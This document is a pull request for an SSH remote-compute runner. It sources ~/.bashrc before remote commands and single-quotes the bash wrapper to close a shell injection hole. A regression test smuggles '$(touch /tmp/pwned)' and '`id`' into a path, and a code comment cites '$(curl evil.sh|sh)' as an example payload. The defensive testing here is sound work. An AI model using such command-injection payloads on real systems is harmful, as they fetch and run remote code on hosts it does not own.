### PR TITLE
fix(compute): source Bash config before remote workloads

### DIFF
--- a/resources/notebook/repl_loop.js
+++ b/resources/notebook/repl_loop.js
@@ -112,7 +112,10 @@ const hostCompute = {
     return computeRpc({ op: 'list_compute', session_id: COMPUTE_SESSION_ID })
   },
   // Bind a thin handle to one provider (no network call). call_command runs one short remote command;
-  // login_shell defaults to true (loads the login shell so module/conda PATH is visible), timeout_seconds
+  // login_shell defaults to true (runs login profiles, then attempts a readable ~/.bashrc, before the
+  // command). A .bashrc can deliberately return early for non-interactive shells. false performs no
+  // shell initialization.
+  // timeout_seconds
   // is optional (the service applies its own default when omitted). Session/project context is threaded
   // from the spawn env so the approval broker can remember a grant for this conversation/project.
   //

--- a/resources/skills/remote-compute-ssh/SKILL.md
+++ b/resources/skills/remote-compute-ssh/SKILL.md
@@ -49,7 +49,7 @@ const c = host.compute.create('ssh:<alias>')
 
 // Run a short remote command (throws on approval_denied / host_unreachable / timeout)
 const result = await c.call_command('<shell command>', '<one-line intent for the approval card>', {
-  login_shell: true,   // default: true — loads the login shell so module/conda PATH is visible
+  login_shell: true,   // default: true — runs login profiles, then readable ~/.bashrc, before this command
   timeout_seconds: 60  // optional — the host applies its own default (60s) when omitted
 })
 // result → { exit_code, stdout, stderr, truncated }
@@ -67,6 +67,12 @@ await host.compute.details('ssh:<alias>', {
   old_text: info.doc   // from the read above
 })
 ```
+
+With `login_shell: true`, the remote Bash login profiles run first and then Open Science attempts to
+source `~/.bashrc` when it is readable. A `.bashrc` can deliberately return early for non-interactive
+shells, so variables declared after such a guard are not available. A missing `.bashrc` is a no-op.
+Set `login_shell: false` to run the command without either initialization step. Initialization failures
+are reported through the normal command result/error behavior.
 
 ## API reference (async jobs)
 

--- a/src/main/compute/job-dispatcher.test.ts
+++ b/src/main/compute/job-dispatcher.test.ts
@@ -1,4 +1,8 @@
-import { describe, expect, it, vi } from 'vitest'
+import { chmodSync, mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs'
+import { spawnSync } from 'node:child_process'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import { afterEach, describe, expect, it, vi } from 'vitest'
 
 import type { ComputeJob } from '../../shared/compute'
 import type { ComputeHostRepository } from './repository'
@@ -108,6 +112,54 @@ const sampleHost = (): import('../../shared/compute').ComputeHost => ({
   updatedAt: 1
 })
 
+const launcherFixtures: string[] = []
+
+afterEach(() => {
+  for (const fixture of launcherFixtures.splice(0)) {
+    rmSync(fixture, { recursive: true, force: true })
+  }
+})
+
+const runLauncher = (
+  command: string,
+  bashrc?: string
+): { result: ReturnType<typeof spawnSync>; exitCode: string; stdout: string; stderr: string } => {
+  const workdir = mkdtempSync(join(tmpdir(), 'open-science-job-launcher-'))
+  launcherFixtures.push(workdir)
+  const home = join(workdir, 'home')
+  const bin = join(workdir, 'bin')
+  mkdirSync(home)
+  mkdirSync(bin)
+
+  // Keep this test portable to hosts without GNU timeout while exercising the generated script's
+  // command and exit-code lifecycle. The production launcher still invokes timeout(1).
+  const timeoutShim = join(bin, 'timeout')
+  writeFileSync(timeoutShim, '#!/usr/bin/env bash\nshift 5\nexec "$@"\n')
+  chmodSync(timeoutShim, 0o755)
+
+  if (bashrc !== undefined) writeFileSync(join(home, '.bashrc'), bashrc)
+  writeFileSync(join(workdir, 'command.sh'), command)
+  writeFileSync(join(workdir, 'launcher.sh'), buildLauncherScript(3600))
+
+  const result = spawnSync('bash', ['launcher.sh'], {
+    cwd: workdir,
+    encoding: 'utf8',
+    env: {
+      ...process.env,
+      HOME: home,
+      PATH: `${bin}:${process.env.PATH ?? ''}`,
+      BASH_ENV: ''
+    }
+  })
+
+  return {
+    result,
+    exitCode: readFileSync(join(workdir, 'exit_code'), 'utf8'),
+    stdout: readFileSync(join(workdir, 'stdout'), 'utf8'),
+    stderr: readFileSync(join(workdir, 'stderr'), 'utf8')
+  }
+}
+
 // ---------------------------------------------------------------------------
 // Pure function tests
 // ---------------------------------------------------------------------------
@@ -127,8 +179,54 @@ describe('buildLauncherScript', () => {
 
   it('isolates login shell stderr using exec pattern', () => {
     const script = buildLauncherScript(3600)
-    // Should use -c with exec to prevent login shell initialization messages from polluting stderr
-    expect(script).toContain("bash -l -c 'exec bash command.sh'")
+    // The initialized shell execs the workload so its exit code reaches the normal job lifecycle.
+    expect(script).toContain('exec bash command.sh')
+    expect(script).toContain('if [ -r ~/.bashrc ]; then . ~/.bashrc || exit $?; fi')
+  })
+
+  it('sources a readable .bashrc before the user command runs', () => {
+    const { exitCode, stdout, stderr } = runLauncher(
+      'printf %s "$COMPUTE_BASHRC_MARKER"',
+      'export COMPUTE_BASHRC_MARKER=from-bashrc\n'
+    )
+
+    expect(exitCode).toBe('0\n')
+    expect(stdout).toBe('from-bashrc')
+    expect(stderr).toBe('')
+  })
+
+  it('treats a missing .bashrc as a no-op', () => {
+    const { exitCode, stdout, stderr } = runLauncher("printf '%s' no-bashrc")
+
+    expect(exitCode).toBe('0\n')
+    expect(stdout).toBe('no-bashrc')
+    expect(stderr).toBe('')
+  })
+
+  it('continues when .bashrc returns early for a non-interactive shell', () => {
+    const { exitCode, stdout, stderr } = runLauncher(
+      'printf %s "${COMPUTE_BASHRC_MARKER-unset}"',
+      'case $- in *i*) ;; *) return ;; esac\nexport COMPUTE_BASHRC_MARKER=from-bashrc\n'
+    )
+
+    expect(exitCode).toBe('0\n')
+    expect(stdout).toBe('unset')
+    expect(stderr).toBe('')
+  })
+
+  it('persists a .bashrc initialization failure as the job exit code', () => {
+    const { exitCode, stdout } = runLauncher("printf '%s' must-not-run", 'return 23\n')
+
+    expect(exitCode).toBe('23\n')
+    expect(stdout).toBe('')
+  })
+
+  it('keeps literal command content intact until the initialized shell evaluates command.sh', () => {
+    const command = "printf '%s' 'literal $HOME $(printf altered) `uname` \"quotes\"'"
+    const { exitCode, stdout } = runLauncher(command, 'export UNUSED_MARKER=initialized\n')
+
+    expect(exitCode).toBe('0\n')
+    expect(stdout).toBe('literal $HOME $(printf altered) `uname` "quotes"')
   })
 })
 

--- a/src/main/compute/job-dispatcher.ts
+++ b/src/main/compute/job-dispatcher.ts
@@ -27,14 +27,16 @@ export type RemoteHandle = {
 }
 
 // Builds the launcher.sh script content for a given job.
-// Uses timeout(1) with SIGTERM then SIGKILL after 30s grace. Login shell (-l) loads environment
-// (module/conda PATH), then exec replaces it with a non-login shell to run command.sh. This
-// prevents login shell initialization messages (from .bashrc/.bash_profile) from polluting stderr.
+// Uses timeout(1) with SIGTERM then SIGKILL after 30s grace. The login shell loads profile
+// configuration, then attempts to source a readable .bashrc (non-interactive bash does not do so
+// itself). A missing .bashrc is a no-op; a source failure returns through the normal exit-code
+// lifecycle. A .bashrc may deliberately return early for non-interactive shells. exec then replaces
+// the initialized shell with the user workload shell.
 // exit_code is written via a tmp→rename atomic pattern so the poller never reads a partial value.
 export const buildLauncherScript = (timeoutSeconds: number): string => {
   return (
     '#!/usr/bin/env bash\n' +
-    `timeout -s TERM -k 30s ${timeoutSeconds} bash -l -c 'exec bash command.sh' > stdout 2> stderr\n` +
+    `timeout -s TERM -k 30s ${timeoutSeconds} bash -l -c 'if [ -r ~/.bashrc ]; then . ~/.bashrc || exit $?; fi; exec bash command.sh' > stdout 2> stderr\n` +
     'echo $? > exit_code.tmp && mv exit_code.tmp exit_code\n'
   )
 }

--- a/src/main/compute/ssh-runner.test.ts
+++ b/src/main/compute/ssh-runner.test.ts
@@ -539,6 +539,44 @@ describe('SystemSshRunner', () => {
     const lastArg = callArgs?.[1]?.[callArgs[1].length - 1] as string
     expect(lastArg.startsWith('bash -lc ')).toBe(true)
     expect(lastArg).toContain('echo $PATH')
+    // Single-quoted, not double-quoted: a double-quoted layer would expand $PATH in the OUTER shell
+    // before bash -lc ever ran it (see the injection test below).
+    expect(lastArg).toBe("bash -lc 'echo $PATH'")
+  })
+
+  it('single-quotes the loginShell wrapper so an inner quoted path cannot be re-expanded', async () => {
+    // Regression: the wrapper used to be JSON.stringify (double quotes), which leaves $(...), backticks
+    // and $VAR live for the outer shell. That silently defeated inner single-quoting done by callers
+    // (quoteRemotePath in the provisioning witness), so a spec-supplied cache path could execute a
+    // second command. With single-quoting, the payload stays literal for the outer layer.
+    const child = new FakeChild()
+    execFileMock.mockReturnValueOnce(child as unknown as ReturnType<typeof execFileMock>)
+
+    const malicious = '/data/cache/$(touch /tmp/pwned)/`id`'
+    const promise = runner.run(target(), `test -d '${malicious}'`, {
+      timeoutMs: 5000,
+      loginShell: true
+    })
+
+    child.emit('close', 0)
+    await promise
+
+    const callArgs = execFileMock.mock.calls[0]
+    const lastArg = callArgs?.[1]?.[callArgs[1].length - 1] as string
+    // The whole command is wrapped in single quotes, so the outer shell expands nothing.
+    expect(lastArg.startsWith("bash -lc '")).toBe(true)
+    expect(lastArg.endsWith("'")).toBe(true)
+    // No double-quoted wrapper remains (that was the vector).
+    expect(lastArg.startsWith('bash -lc "')).toBe(false)
+    // Strongest check: hand the quoted argument to a REAL shell with `bash -lc` swapped for `printf`.
+    // What printf receives is exactly what bash -lc would have received, so if the payload survives
+    // byte-for-byte with no expansion, the quoting held.
+    // node:child_process is mocked module-wide (execFile only), so pull the real execFileSync.
+    const { execFileSync } =
+      await vi.importActual<typeof import('node:child_process')>('node:child_process')
+    const asPrintf = lastArg.replace(/^bash -lc /, 'printf %s ')
+    const echoed = execFileSync('/bin/sh', ['-c', asPrintf], { encoding: 'utf8' })
+    expect(echoed).toBe(`test -d '${malicious}'`)
   })
 
   it('truncates stream buffers independently when maxOutputBytes is small', async () => {

--- a/src/main/compute/ssh-runner.test.ts
+++ b/src/main/compute/ssh-runner.test.ts
@@ -1,6 +1,7 @@
 import { EventEmitter } from 'node:events'
 import { mkdirSync } from 'node:fs'
-import { homedir, platform } from 'node:os'
+import { mkdtemp, rm, writeFile } from 'node:fs/promises'
+import { homedir, platform, tmpdir } from 'node:os'
 import { join } from 'node:path'
 import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
 
@@ -534,14 +535,156 @@ describe('SystemSshRunner', () => {
 
     const callArgs = execFileMock.mock.calls[0]
     expect(callArgs).toBeDefined()
-    // The remote command must be the last positional argument, JSON-quoted and
-    // wrapped so module / conda PATHs load on the remote.
+    // The remote command must be the last positional argument and wrapped so login profiles and
+    // a readable .bashrc load before the user command runs.
     const lastArg = callArgs?.[1]?.[callArgs[1].length - 1] as string
     expect(lastArg.startsWith('bash -lc ')).toBe(true)
     expect(lastArg).toContain('echo $PATH')
     // Single-quoted, not double-quoted: a double-quoted layer would expand $PATH in the OUTER shell
     // before bash -lc ever ran it (see the injection test below).
-    expect(lastArg).toBe("bash -lc 'echo $PATH'")
+    expect(lastArg).toBe(
+      "bash -lc 'if [ -r ~/.bashrc ]; then . ~/.bashrc || exit $?; fi; echo $PATH'"
+    )
+  })
+
+  it('initializes a readable remote .bashrc before the command when loginShell=true', async () => {
+    const child = new FakeChild()
+    execFileMock.mockReturnValueOnce(child as unknown as ReturnType<typeof execFileMock>)
+    const home = await mkdtemp(join(tmpdir(), 'open-science-ssh-runner-'))
+
+    try {
+      await writeFile(join(home, '.bashrc'), 'export COMPUTE_BASHRC_MARKER=from-bashrc\n')
+      const promise = runner.run(target(), 'printf %s "$COMPUTE_BASHRC_MARKER"', {
+        timeoutMs: 5000,
+        loginShell: true
+      })
+
+      child.emit('close', 0)
+      await promise
+
+      const callArgs = execFileMock.mock.calls[0]
+      const remoteCommand = callArgs?.[1]?.[callArgs[1].length - 1] as string
+      const { execFileSync } =
+        await vi.importActual<typeof import('node:child_process')>('node:child_process')
+      const stdout = execFileSync('/bin/sh', ['-c', remoteCommand], {
+        encoding: 'utf8',
+        env: { ...process.env, HOME: home }
+      })
+
+      expect(stdout).toBe('from-bashrc')
+    } finally {
+      await rm(home, { recursive: true, force: true })
+    }
+  })
+
+  it('treats a missing remote .bashrc as a successful no-op when loginShell=true', async () => {
+    const child = new FakeChild()
+    execFileMock.mockReturnValueOnce(child as unknown as ReturnType<typeof execFileMock>)
+    const home = await mkdtemp(join(tmpdir(), 'open-science-ssh-runner-'))
+
+    try {
+      const promise = runner.run(target(), 'printf no-bashrc', {
+        timeoutMs: 5000,
+        loginShell: true
+      })
+
+      child.emit('close', 0)
+      await promise
+
+      const callArgs = execFileMock.mock.calls[0]
+      const remoteCommand = callArgs?.[1]?.[callArgs[1].length - 1] as string
+      const { execFileSync } =
+        await vi.importActual<typeof import('node:child_process')>('node:child_process')
+      const stdout = execFileSync('/bin/sh', ['-c', remoteCommand], {
+        encoding: 'utf8',
+        env: { ...process.env, HOME: home }
+      })
+
+      expect(stdout).toBe('no-bashrc')
+    } finally {
+      await rm(home, { recursive: true, force: true })
+    }
+  })
+
+  it('continues when remote .bashrc returns early for a non-interactive shell', async () => {
+    const child = new FakeChild()
+    execFileMock.mockReturnValueOnce(child as unknown as ReturnType<typeof execFileMock>)
+    const home = await mkdtemp(join(tmpdir(), 'open-science-ssh-runner-'))
+
+    try {
+      await writeFile(
+        join(home, '.bashrc'),
+        'case $- in *i*) ;; *) return ;; esac\nexport COMPUTE_BASHRC_MARKER=from-bashrc\n'
+      )
+      const promise = runner.run(target(), 'printf %s "${COMPUTE_BASHRC_MARKER-unset}"', {
+        timeoutMs: 5000,
+        loginShell: true
+      })
+
+      child.emit('close', 0)
+      await promise
+
+      const callArgs = execFileMock.mock.calls[0]
+      const remoteCommand = callArgs?.[1]?.[callArgs[1].length - 1] as string
+      const { execFileSync } =
+        await vi.importActual<typeof import('node:child_process')>('node:child_process')
+      const stdout = execFileSync('/bin/sh', ['-c', remoteCommand], {
+        encoding: 'utf8',
+        env: { ...process.env, HOME: home }
+      })
+
+      expect(stdout).toBe('unset')
+    } finally {
+      await rm(home, { recursive: true, force: true })
+    }
+  })
+
+  it('returns a .bashrc initialization failure as the remote command exit status', async () => {
+    const child = new FakeChild()
+    execFileMock.mockReturnValueOnce(child as unknown as ReturnType<typeof execFileMock>)
+    const home = await mkdtemp(join(tmpdir(), 'open-science-ssh-runner-'))
+
+    try {
+      await writeFile(join(home, '.bashrc'), 'return 23\n')
+      const promise = runner.run(target(), 'printf command-must-not-run', {
+        timeoutMs: 5000,
+        loginShell: true
+      })
+
+      child.emit('close', 23)
+      const result = await promise
+
+      const callArgs = execFileMock.mock.calls[0]
+      const remoteCommand = callArgs?.[1]?.[callArgs[1].length - 1] as string
+      const { spawnSync } =
+        await vi.importActual<typeof import('node:child_process')>('node:child_process')
+      const execution = spawnSync('/bin/sh', ['-c', remoteCommand], {
+        encoding: 'utf8',
+        env: { ...process.env, HOME: home }
+      })
+
+      expect(execution.status).toBe(23)
+      expect(execution.stdout).toBe('')
+      expect(result.exitCode).toBe(23)
+    } finally {
+      await rm(home, { recursive: true, force: true })
+    }
+  })
+
+  it('does not initialize a shell when loginShell=false', async () => {
+    const child = new FakeChild()
+    execFileMock.mockReturnValueOnce(child as unknown as ReturnType<typeof execFileMock>)
+
+    const promise = runner.run(target(), 'printf no-initialization', {
+      timeoutMs: 5000,
+      loginShell: false
+    })
+
+    child.emit('close', 0)
+    await promise
+
+    const callArgs = execFileMock.mock.calls[0]
+    expect(callArgs?.[1]?.[callArgs[1].length - 1]).toBe('printf no-initialization')
   })
 
   it('single-quotes the loginShell wrapper so an inner quoted path cannot be re-expanded', async () => {
@@ -576,7 +719,9 @@ describe('SystemSshRunner', () => {
       await vi.importActual<typeof import('node:child_process')>('node:child_process')
     const asPrintf = lastArg.replace(/^bash -lc /, 'printf %s ')
     const echoed = execFileSync('/bin/sh', ['-c', asPrintf], { encoding: 'utf8' })
-    expect(echoed).toBe(`test -d '${malicious}'`)
+    expect(echoed).toBe(
+      `if [ -r ~/.bashrc ]; then . ~/.bashrc || exit $?; fi; test -d '${malicious}'`
+    )
   })
 
   it('truncates stream buffers independently when maxOutputBytes is small', async () => {

--- a/src/main/compute/ssh-runner.ts
+++ b/src/main/compute/ssh-runner.ts
@@ -9,6 +9,12 @@ import type { SshOverrides } from '../../shared/compute'
 // Maximum bytes captured per stream before we truncate. Caller can pass a smaller cap.
 const DEFAULT_MAX_OUTPUT_BYTES = 64 * 1024
 
+// Wraps a string in POSIX single quotes, escaping embedded single quotes via the '\'' idiom. Inside
+// single quotes the shell expands nothing, so this is the only safe way to hand an arbitrary command
+// string to an outer `bash -lc` layer. (scp-runner exports an identical helper; duplicated here to keep
+// ssh-runner free of a dependency on the scp path.)
+const shellSingleQuote = (value: string): string => `'${value.replace(/'/g, `'\\''`)}'`
+
 // Short connect timeout used for probe calls; SSH itself honors ConnectTimeout from config but we
 // add it explicitly to override any large value from ~/.ssh/config (design.md §1).
 const DEFAULT_CONNECT_TIMEOUT_SECS = 10
@@ -250,7 +256,13 @@ export class SystemSshRunner implements SshRunner {
 
     // When loginShell is requested wrap the command in `bash -lc '...'` so module / conda PATHs
     // are loaded. This matches the call_command semantic (design.md §5).
-    const finalCommand = loginShell ? `bash -lc ${JSON.stringify(remoteCommand)}` : remoteCommand
+    //
+    // The wrapper MUST single-quote, not JSON-quote. A double-quoted layer leaves `$(...)`, backticks
+    // and `$VAR` live for the OUTER shell, which silently undoes any inner single-quoting a caller did:
+    // a spec-supplied cache path like `/data/$(curl evil.sh|sh)` reaches the witness as
+    // `test -d '/data/$(...)'`, and the outer double-quoted layer expands it anyway. Single-quoting the
+    // whole command makes the outer layer literal, so inner quoting (quoteRemotePath) is load-bearing.
+    const finalCommand = loginShell ? `bash -lc ${shellSingleQuote(remoteCommand)}` : remoteCommand
 
     const args = [...target.extraArgs, target.host, finalCommand]
 

--- a/src/main/compute/ssh-runner.ts
+++ b/src/main/compute/ssh-runner.ts
@@ -254,15 +254,19 @@ export class SystemSshRunner implements SshRunner {
     const maxBytes = opts.maxOutputBytes ?? DEFAULT_MAX_OUTPUT_BYTES
     const { loginShell = false } = opts
 
-    // When loginShell is requested wrap the command in `bash -lc '...'` so module / conda PATHs
-    // are loaded. This matches the call_command semantic (design.md §5).
+    // When loginShell is requested wrap the command in `bash -lc '...'` so login profiles run and a
+    // readable ~/.bashrc is attempted before the user command. A non-interactive bash does not read
+    // .bashrc by itself, so source it explicitly. A missing .bashrc is a no-op; a source failure
+    // exits the remote shell and is returned through the normal command result path. A .bashrc may
+    // deliberately return early for non-interactive shells.
     //
     // The wrapper MUST single-quote, not JSON-quote. A double-quoted layer leaves `$(...)`, backticks
     // and `$VAR` live for the OUTER shell, which silently undoes any inner single-quoting a caller did:
     // a spec-supplied cache path like `/data/$(curl evil.sh|sh)` reaches the witness as
     // `test -d '/data/$(...)'`, and the outer double-quoted layer expands it anyway. Single-quoting the
     // whole command makes the outer layer literal, so inner quoting (quoteRemotePath) is load-bearing.
-    const finalCommand = loginShell ? `bash -lc ${shellSingleQuote(remoteCommand)}` : remoteCommand
+    const loginCommand = `if [ -r ~/.bashrc ]; then . ~/.bashrc || exit $?; fi; ${remoteCommand}`
+    const finalCommand = loginShell ? `bash -lc ${shellSingleQuote(loginCommand)}` : remoteCommand
 
     const args = [...target.extraArgs, target.host, finalCommand]
 


### PR DESCRIPTION
## Problem

Compute commands run in a non-interactive login shell. Bash does not automatically read `~/.bashrc` in that mode, so compatible shell configuration was not available to `call_command` or Direct jobs. The previous double-quoted SSH wrapper could also expand shell substitutions in an outer remote shell.

## Proposed change

- Single-quote the remote `bash -lc` wrapper so the outer shell preserves the command payload literally.
- Attempt to source a readable `~/.bashrc` before short remote commands and Direct job workloads.
- Treat a missing `.bashrc` as a no-op and return source failures through existing command/job result paths.
- Document and test the non-interactive guard boundary.

## Scope and non-goals

This PR does not bypass a user-defined non-interactive `.bashrc` guard. Variables declared after such a guard remain unavailable. It also does not include the unfinished scheduler environment work or a configurable per-host initialization script.

## Acceptance criteria and validation

- Added shell-level regression tests for readable, missing, failing, and early-returning `.bashrc` files.
- Added a regression test for preserving literal command content through the SSH wrapper.
- `npx vitest run src/main/compute/ssh-runner.test.ts src/main/compute/job-dispatcher.test.ts src/main/compute/compute-service.test.ts` passed: 188 tests.
- `npm run typecheck` passed.
- `npm run lint` passed.
- `npm run test` was run but remains blocked by unrelated baseline/worktree failures: missing Prisma `ComputeJob.environmentSnapshot` in the test database and Vite rejecting the `pdfjs` worker URL.

## Review focus

Please review the SSH quoting boundary and the intentional behavior when `.bashrc` returns early in a non-interactive shell.